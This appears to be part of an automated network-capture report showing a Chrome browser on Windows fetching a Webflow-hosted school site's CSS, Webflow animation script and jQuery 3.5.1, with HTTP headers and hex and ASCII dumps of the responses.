                                                    2025-03-28 12:42:41 UTC1369INData Raw: 20 2e 31 70 78 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 64 65 66 61 75 6c 74 2c 20 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 75 70 6c 6f 61 64 69 6e 67 2c 20 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 73 75 63 63 65 73 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 65 72 72 6f 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 77 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 64 65 66 61 75 6c
                                                    Data Ascii: .1px; position: absolute; overflow: hidden;}.w-file-upload-default, .w-file-upload-uploading, .w-file-upload-success { color: #333; display: inline-block;}.w-file-upload-error { margin-top: 10px; display: block;}.w-file-upload-defaul


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.549734104.18.160.1174436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:40 UTC653OUTGET /67e2c79fd85ebcb1b252e594/js/webflow.751e0867.f68fe005672cde30.js HTTP/1.1
                                                    Host: cdn.prod.website-files.com
                                                    Connection: keep-alive
                                                    sec-ch-ua-platform: "Windows"
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    Accept: */*
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: script
                                                    Sec-Fetch-Storage-Access: active
                                                    Referer: https://littlestownseniorhighschool.webflow.io/
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:41 UTC654INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:42:40 GMT
                                                    Content-Type: text/javascript
                                                    Content-Length: 36033
                                                    Connection: close
                                                    x-amz-id-2: Zg0KoARx2A86U7Nc3DFhugRfqHF7bkKcOmDwwhU/TfXV61uCOhZ8wm5Jzhph/eAMNNLscZ0VXfw=
                                                    x-amz-request-id: 7E5D5M7EGVCFHVDN
                                                    Last-Modified: Tue, 25 Mar 2025 15:13:44 GMT
                                                    ETag: "c2baeb117caff557b76166e9bf46d467"
                                                    x-amz-server-side-encryption: AES256
                                                    Cache-Control: public, max-age=31536000, immutable
                                                    x-amz-version-id: VzksEbqW1V55ogUBazX2C76KjobfM5cV
                                                    CF-Cache-Status: HIT
                                                    Age: 250131
                                                    Accept-Ranges: bytes
                                                    Access-Control-Allow-Origin: *
                                                    Server: cloudflare
                                                    CF-RAY: 927735762b8718bc-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2025-03-28 12:42:41 UTC715INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 34 38 37 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 77 69 6e 64 6f 77 2e 74 72 61 6d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 65 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 43 2e 42 61 72 65 29 2e 69 6e 69 74 28 74 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 76 61 72 20 65 3d 70 61 72 73 65 49 6e 74 28 74 2e 73 6c 69 63 65 28 31 29 2c 31 36 29 3b 72 65 74 75 72 6e 5b 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 2c 32 35 35 26 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 22 23 22 2b 28 30 78 31 30 30 30 30 30 30 7c 74 3c 3c 31 36 7c 65 3c 3c 38 7c 6e 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 6c
                                                    Data Ascii: (()=>{var t={487:function(){"use strict";window.tram=function(t){function e(t,e){return(new C.Bare).init(t,e)}function n(t){var e=parseInt(t.slice(1),16);return[e>>16&255,e>>8&255,255&e]}function i(t,e,n){return"#"+(0x1000000|t<<16|e<<8|n).toString(16).sl
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 63 74 69 6f 6e 20 6c 28 29 7b 7d 75 3d 3d 3d 6e 26 26 28 75 3d 73 2c 73 3d 4f 62 6a 65 63 74 29 2c 63 2e 42 61 72 65 3d 6c 3b 76 61 72 20 66 2c 68 3d 6f 5b 74 5d 3d 73 5b 74 5d 2c 64 3d 6c 5b 74 5d 3d 63 5b 74 5d 3d 6e 65 77 20 6f 3b 72 65 74 75 72 6e 20 64 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 63 2c 63 2e 6d 69 78 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6c 5b 74 5d 3d 63 5b 74 5d 3d 61 28 63 2c 65 29 5b 74 5d 2c 63 7d 2c 63 2e 6f 70 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 66 3d 7b 7d 2c 72 28 74 29 3f 66 3d 74 2e 63 61 6c 6c 28 63 2c 64 2c 68 2c 63 2c 73 29 3a 69 28 74 29 26 26 28 66 3d 74 29 2c 69 28 66 29 29 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 66 29 65 2e 63 61 6c 6c 28 66 2c 6e 29 26 26 28 64 5b 6e 5d 3d 66
                                                    Data Ascii: ction l(){}u===n&&(u=s,s=Object),c.Bare=l;var f,h=o[t]=s[t],d=l[t]=c[t]=new o;return d.constructor=c,c.mixin=function(e){return l[t]=c[t]=a(c,e)[t],c},c.open=function(t){if(f={},r(t)?f=t.call(c,d,h,c,s):i(t)&&(f=t),i(f))for(var n in f)e.call(f,n)&&(d[n]=f
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 34 35 2c 20 30 2e 30 34 35 2c 20 30 2e 33 35 35 2c 20 31 29 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 72 65 74 75 72 6e 28 74 2f 3d 69 2f 32 29 3c 31 3f 6e 2f 32 2a 74 2a 74 2a 74 2b 65 3a 6e 2f 32 2a 28 28 74 2d 3d 32 29 2a 74 2a 74 2b 32 29 2b 65 7d 5d 2c 22 65 61 73 65 2d 69 6e 2d 71 75 61 72 74 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 38 39 35 2c 20 30 2e 30 33 30 2c 20 30 2e 36 38 35 2c 20 30 2e 32 32 30 29 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 72 65 74 75 72 6e 20 6e 2a 28 74 2f 3d 69 29 2a 74 2a 74 2a 74 2b 65 7d 5d 2c 22 65 61 73 65 2d 6f 75 74 2d 71 75 61 72 74 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 36 35 2c 20 30 2e 38 34
                                                    Data Ascii: cubic-bezier(0.645, 0.045, 0.355, 1)",function(t,e,n,i){return(t/=i/2)<1?n/2*t*t*t+e:n/2*((t-=2)*t*t+2)+e}],"ease-in-quart":["cubic-bezier(0.895, 0.030, 0.685, 0.220)",function(t,e,n,i){return n*(t/=i)*t*t*t+e}],"ease-out-quart":["cubic-bezier(0.165, 0.84
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 2d 31 30 2a 74 2f 69 29 2b 31 29 2b 65 7d 5d 2c 22 65 61 73 65 2d 69 6e 2d 6f 75 74 2d 65 78 70 6f 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 31 2c 20 30 2c 20 30 2c 20 31 29 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 72 65 74 75 72 6e 20 30 3d 3d 3d 74 3f 65 3a 74 3d 3d 3d 69 3f 65 2b 6e 3a 28 74 2f 3d 69 2f 32 29 3c 31 3f 6e 2f 32 2a 4d 61 74 68 2e 70 6f 77 28 32 2c 31 30 2a 28 74 2d 31 29 29 2b 65 3a 6e 2f 32 2a 28 2d 4d 61 74 68 2e 70 6f 77 28 32 2c 2d 31 30 2a 2d 2d 74 29 2b 32 29 2b 65 7d 5d 2c 22 65 61 73 65 2d 69 6e 2d 63 69 72 63 22 3a 5b 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 30 30 2c 20 30 2e 30 34 30 2c 20 30 2e 39 38 30 2c 20 30 2e 33 33 35 29 22 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 72
                                                    Data Ascii: -10*t/i)+1)+e}],"ease-in-out-expo":["cubic-bezier(1, 0, 0, 1)",function(t,e,n,i){return 0===t?e:t===i?e+n:(t/=i/2)<1?n/2*Math.pow(2,10*(t-1))+e:n/2*(-Math.pow(2,-10*--t)+2)+e}],"ease-in-circ":["cubic-bezier(0.600, 0.040, 0.980, 0.335)",function(t,e,n,i){r
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 75 6e 69 74 6c 65 73 73 22 2c 45 3d 2f 28 61 6c 6c 7c 6e 6f 6e 65 29 20 30 73 20 65 61 73 65 20 30 73 2f 2c 5f 3d 2f 5e 28 77 69 64 74 68 7c 68 65 69 67 68 74 29 24 2f 2c 4c 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 2c 7a 3d 5b 22 57 65 62 6b 69 74 22 2c 22 4d 6f 7a 22 2c 22 4f 22 2c 22 6d 73 22 5d 2c 24 3d 5b 22 2d 77 65 62 6b 69 74 2d 22 2c 22 2d 6d 6f 7a 2d 22 2c 22 2d 6f 2d 22 2c 22 2d 6d 73 2d 22 5d 2c 41 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 20 69 6e 20 4c 2e 73 74 79 6c 65 29 72 65 74 75 72 6e 7b 64 6f 6d 3a 74 2c 63 73 73 3a 74 7d 3b 76 61 72 20 65 2c 6e 2c 69 3d 22 22 2c 72 3d 74 2e 73 70 6c 69 74 28 22 2d 22 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 72 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 69 2b 3d
                                                    Data Ascii: unitless",E=/(all|none) 0s ease 0s/,_=/^(width|height)$/,L=document.createElement("a"),z=["Webkit","Moz","O","ms"],$=["-webkit-","-moz-","-o-","-ms-"],A=function(t){if(t in L.style)return{dom:t,css:t};var e,n,i="",r=t.split("-");for(e=0;e<r.length;e++)i+=
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 72 26 26 74 68 69 73 2e 74 69 6d 65 72 2e 64 65 73 74 72 6f 79 28 29 2c 74 68 69 73 2e 71 75 65 75 65 3d 5b 5d 2c 74 68 69 73 2e 61 63 74 69 76 65 3d 21 31 29 2c 22 6e 75 6d 62 65 72 22 3d 3d 61 26 26 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 74 69 6d 65 72 3d 6e 65 77 20 50 28 7b 64 75 72 61 74 69 6f 6e 3a 74 2c 63 6f 6e 74 65 78 74 3a 74 68 69 73 2c 63 6f 6d 70 6c 65 74 65 3a 72 7d 29 2c 76 6f 69 64 28 74 68 69 73 2e 61 63 74 69 76 65 3d 21 30 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 61 26 26 65 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 68 69 64 65 22 3a 75 2e 63 61 6c 6c 28 74 68 69 73 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 74 6f 70 22 3a 73 2e 63 61 6c 6c 28 74 68 69 73 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 72 65 64 72 61 77 22 3a 63
                                                    Data Ascii: r&&this.timer.destroy(),this.queue=[],this.active=!1),"number"==a&&e)return this.timer=new P({duration:t,context:this,complete:r}),void(this.active=!0);if("string"==a&&e){switch(t){case"hide":u.call(this);break;case"stop":s.call(this);break;case"redraw":c
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 2c 69 29 7b 76 61 72 20 72 2c 6f 2c 61 2c 73 2c 75 3d 65 21 3d 3d 68 2c 63 3d 7b 7d 3b 66 6f 72 28 72 20 69 6e 20 74 29 61 3d 74 5b 72 5d 2c 72 20 69 6e 20 59 3f 28 63 2e 74 72 61 6e 73 66 6f 72 6d 7c 7c 28 63 2e 74 72 61 6e 73 66 6f 72 6d 3d 7b 7d 29 2c 63 2e 74 72 61 6e 73 66 6f 72 6d 5b 72 5d 3d 61 29 3a 28 76 2e 74 65 73 74 28 72 29 26 26 28 72 3d 72 2e 72 65 70 6c 61 63 65 28 2f 5b 41 2d 5a 5d 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 2d 22 2b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 29 2c 72 20 69 6e 20 55 3f 63 5b 72 5d 3d 61 3a 28 73 7c 7c 28 73 3d 7b 7d 29 2c 73 5b 72 5d 3d 61 29 29 3b 66 6f 72 28 72 20 69 6e 20 63 29 7b 69 66 28 61 3d 63 5b 72 5d 2c 21 28 6f 3d 74 68 69 73 2e 70 72 6f 70 73 5b 72 5d 29 29 7b 69
                                                    Data Ascii: ,i){var r,o,a,s,u=e!==h,c={};for(r in t)a=t[r],r in Y?(c.transform||(c.transform={}),c.transform[r]=a):(v.test(r)&&(r=r.replace(/[A-Z]/g,function(t){return"-"+t.toLowerCase()})),r in U?c[r]=a:(s||(s={}),s[r]=a));for(r in c){if(a=c[r],!(o=this.props[r])){i
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 74 3d 22 62 6c 6f 63 6b 22 29 2c 74 68 69 73 2e 65 6c 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 74 7d 29 2c 77 28 22 68 69 64 65 22 2c 75 29 2c 77 28 22 72 65 64 72 61 77 22 2c 63 29 2c 77 28 22 64 65 73 74 72 6f 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 63 61 6c 6c 28 74 68 69 73 29 2c 74 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 65 6c 2c 70 29 2c 74 68 69 73 2e 24 65 6c 3d 74 68 69 73 2e 65 6c 3d 6e 75 6c 6c 7d 29 7d 29 2c 43 3d 6c 28 46 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 6e 29 7b 76 61 72 20 69 3d 74 2e 64 61 74 61 28 65 2c 70 29 7c 7c 74 2e 64 61 74 61 28 65 2c 70 2c 6e 65 77 20 46 2e 42 61 72 65 29 3b 72 65 74 75 72 6e 20 69 2e 65 6c 7c 7c 69 2e 69 6e 69 74 28 65 29 2c 6e 3f 69 2e 73 74 61
                                                    Data Ascii: t="block"),this.el.style.display=t}),w("hide",u),w("redraw",c),w("destroy",function(){s.call(this),t.removeData(this.el,p),this.$el=this.el=null})}),C=l(F,function(e){function n(e,n){var i=t.data(e,p)||t.data(e,p,new F.Bare);return i.el||i.init(e),n?i.sta
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 61 75 74 6f 22 3d 3d 74 68 69 73 2e 65 6c 2e 73 74 79 6c 65 5b 74 68 69 73 2e 6e 61 6d 65 5d 26 26 28 74 68 69 73 2e 75 70 64 61 74 65 28 74 68 69 73 2e 67 65 74 28 29 29 2c 74 68 69 73 2e 72 65 64 72 61 77 28 29 29 2c 22 61 75 74 6f 22 3d 3d 74 26 26 28 74 3d 65 2e 63 61 6c 6c 28 74 68 69 73 29 29 29 2c 74 68 69 73 2e 6e 65 78 74 53 74 79 6c 65 3d 74 7d 2c 74 2e 66 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 65 6c 2e 73 74 79 6c 65 5b 74 68 69 73 2e 6e 61 6d 65 5d 7c 7c 74 68 69 73 2e 63 6f 6e 76 65 72 74 28 74 68 69 73 2e 67 65 74 28 29 2c 74 68 69 73 2e 74 79 70 65 29 3b 74 3d 74 68 69 73 2e 63 6f 6e 76 65 72 74 28 74 2c 74 68 69 73 2e 74 79 70 65 29 2c 74 68 69 73 2e 61 75 74 6f 26 26 28 22 61 75 74 6f
                                                    Data Ascii: auto"==this.el.style[this.name]&&(this.update(this.get()),this.redraw()),"auto"==t&&(t=e.call(this))),this.nextStyle=t},t.fallback=function(t){var n=this.el.style[this.name]||this.convert(this.get(),this.type);t=this.convert(t,this.type),this.auto&&("auto
                                                    2025-03-28 12:42:41 UTC1369INData Raw: 75 72 6e 20 74 2b 74 68 69 73 2e 61 6e 67 6c 65 3b 69 66 28 63 26 26 65 2e 74 65 73 74 28 74 29 29 72 65 74 75 72 6e 20 74 3b 73 3d 22 6e 75 6d 62 65 72 28 64 65 67 29 20 6f 72 20 73 74 72 69 6e 67 28 61 6e 67 6c 65 29 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 6b 3a 69 66 28 75 7c 7c 63 26 26 79 2e 74 65 73 74 28 74 29 29 72 65 74 75 72 6e 20 74 3b 73 3d 22 6e 75 6d 62 65 72 28 75 6e 69 74 6c 65 73 73 29 20 6f 72 20 73 74 72 69 6e 67 28 75 6e 69 74 20 6f 72 20 25 29 22 7d 72 65 74 75 72 6e 20 61 28 22 54 79 70 65 20 77 61 72 6e 69 6e 67 3a 20 45 78 70 65 63 74 65 64 3a 20 5b 22 2b 73 2b 22 5d 20 47 6f 74 3a 20 5b 22 2b 74 79 70 65 6f 66 28 6f 3d 74 29 2b 22 5d 20 22 2b 6f 29 2c 74 7d 2c 74 2e 72 65 64 72 61 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73
                                                    Data Ascii: urn t+this.angle;if(c&&e.test(t))return t;s="number(deg) or string(angle)";break;case k:if(u||c&&y.test(t))return t;s="number(unitless) or string(unit or %)"}return a("Type warning: Expected: ["+s+"] Got: ["+typeof(o=t)+"] "+o),t},t.redraw=function(){this


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.54973313.33.251.2104436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:40 UTC674OUTGET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e594 HTTP/1.1
                                                    Host: d3e54v103j8qbb.cloudfront.net
                                                    Connection: keep-alive
                                                    Origin: https://littlestownseniorhighschool.webflow.io
                                                    sec-ch-ua-platform: "Windows"
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    Accept: */*
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: script
                                                    Referer: https://littlestownseniorhighschool.webflow.io/
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:41 UTC617INHTTP/1.1 200 OK
                                                    Content-Type: application/javascript
                                                    Content-Length: 89476
                                                    Connection: close
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET
                                                    Access-Control-Max-Age: 3000
                                                    Last-Modified: Mon, 20 Jul 2020 17:53:02 GMT
                                                    Accept-Ranges: bytes
                                                    Server: AmazonS3
                                                    Date: Thu, 27 Mar 2025 21:21:56 GMT
                                                    Cache-Control: max-age=84600, must-revalidate
                                                    Etag: "dc5e7f18c8d36ac1d3d4753a87c98d0a"
                                                    Via: 1.1 7ea7b08f7e1d26433f5be7f6d4283d3c.cloudfront.net (CloudFront)
                                                    Age: 55245
                                                    X-Cache: Hit from cloudfront
                                                    X-Amz-Cf-Pop: JFK50-P10
                                                    X-Amz-Cf-Id: exSufBQOUT_FLPtpoa4iFFKXaqJCl-x2GbIhsMWvb7v338oXSZj29g==
                                                    2025-03-28 12:42:41 UTC15767INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                    Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                    2025-03-28 12:42:41 UTC16384INData Raw: 2d 34 29 2c 78 3d 22 6f 66 2d 74 79 70 65 22 3d 3d 3d 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 67 26 26 30 3d 3d 3d 76 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 79 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 79 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e
                                                    Data Ascii: -4),x="of-type"===e;return 1===g&&0===v?function(e){return!!e.parentNode}:function(e,t,n){var r,i,o,a,s,u,l=y!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(y){while(l){a=e;while(a=a[l])if(x?a.nodeN
                                                    2025-03-28 12:42:41 UTC16384INData Raw: 45 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 22 6c 6f 61 64 69 6e 67 22 21 3d 3d 45 2e 72 65 61 64 79 53 74 61 74 65 26 26 21 45 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 6f 53 63 72 6f 6c 6c 3f 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 53 2e 72 65 61 64 79 29 3a 28 45 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 42 29 2c 43 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 42 29 29 3b 76 61 72 20 24 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 29 7b 76 61 72 20 73 3d 30 2c 75 3d 65 2e 6c 65 6e 67 74 68 2c 6c 3d 6e 75 6c 6c 3d 3d 6e 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 77 28 6e 29 29 66 6f 72 28 73 20 69 6e 20 69 3d 21 30 2c 6e
                                                    Data Ascii: E.readyState||"loading"!==E.readyState&&!E.documentElement.doScroll?C.setTimeout(S.ready):(E.addEventListener("DOMContentLoaded",B),C.addEventListener("load",B));var $=function(e,t,n,r,i,o,a){var s=0,u=e.length,l=null==n;if("object"===w(n))for(s in i=!0,n
                                                    2025-03-28 12:42:41 UTC16384INData Raw: 2e 5f 65 76 61 6c 55 72 6c 26 26 21 75 2e 6e 6f 4d 6f 64 75 6c 65 26 26 53 2e 5f 65 76 61 6c 55 72 6c 28 75 2e 73 72 63 2c 7b 6e 6f 6e 63 65 3a 75 2e 6e 6f 6e 63 65 7c 7c 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 7d 2c 6c 29 3a 62 28 75 2e 74 65 78 74 43 6f 6e 74 65 6e 74 2e 72 65 70 6c 61 63 65 28 6a 65 2c 22 22 29 2c 75 2c 6c 29 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 2c 69 3d 74 3f 53 2e 66 69 6c 74 65 72 28 74 2c 65 29 3a 65 2c 6f 3d 30 3b 6e 75 6c 6c 21 3d 28 72 3d 69 5b 6f 5d 29 3b 6f 2b 2b 29 6e 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 53 2e 63 6c 65 61 6e 44 61 74 61 28 76 65 28 72 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26
                                                    Data Ascii: ._evalUrl&&!u.noModule&&S._evalUrl(u.src,{nonce:u.nonce||u.getAttribute("nonce")},l):b(u.textContent.replace(je,""),u,l))}return n}function Re(e,t,n){for(var r,i=t?S.filter(t,e):e,o=0;null!=(r=i[o]);o++)n||1!==r.nodeType||S.cleanData(ve(r)),r.parentNode&&
                                                    2025-03-28 12:42:41 UTC16384INData Raw: 74 3a 32 30 30 2c 5f 64 65 66 61 75 6c 74 3a 34 30 30 7d 2c 53 2e 66 6e 2e 64 65 6c 61 79 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 65 29 7b 72 65 74 75 72 6e 20 72 3d 53 2e 66 78 26 26 53 2e 66 78 2e 73 70 65 65 64 73 5b 72 5d 7c 7c 72 2c 65 3d 65 7c 7c 22 66 78 22 2c 74 68 69 73 2e 71 75 65 75 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 72 29 3b 74 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 29 7d 7d 29 7d 2c 72 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 2c 69 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 65 6c 65 63 74 22 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 45 2e 63 72 65 61 74
                                                    Data Ascii: t:200,_default:400},S.fn.delay=function(r,e){return r=S.fx&&S.fx.speeds[r]||r,e=e||"fx",this.queue(e,function(e,t){var n=C.setTimeout(e,r);t.stop=function(){C.clearTimeout(n)}})},rt=E.createElement("input"),it=E.createElement("select").appendChild(E.creat
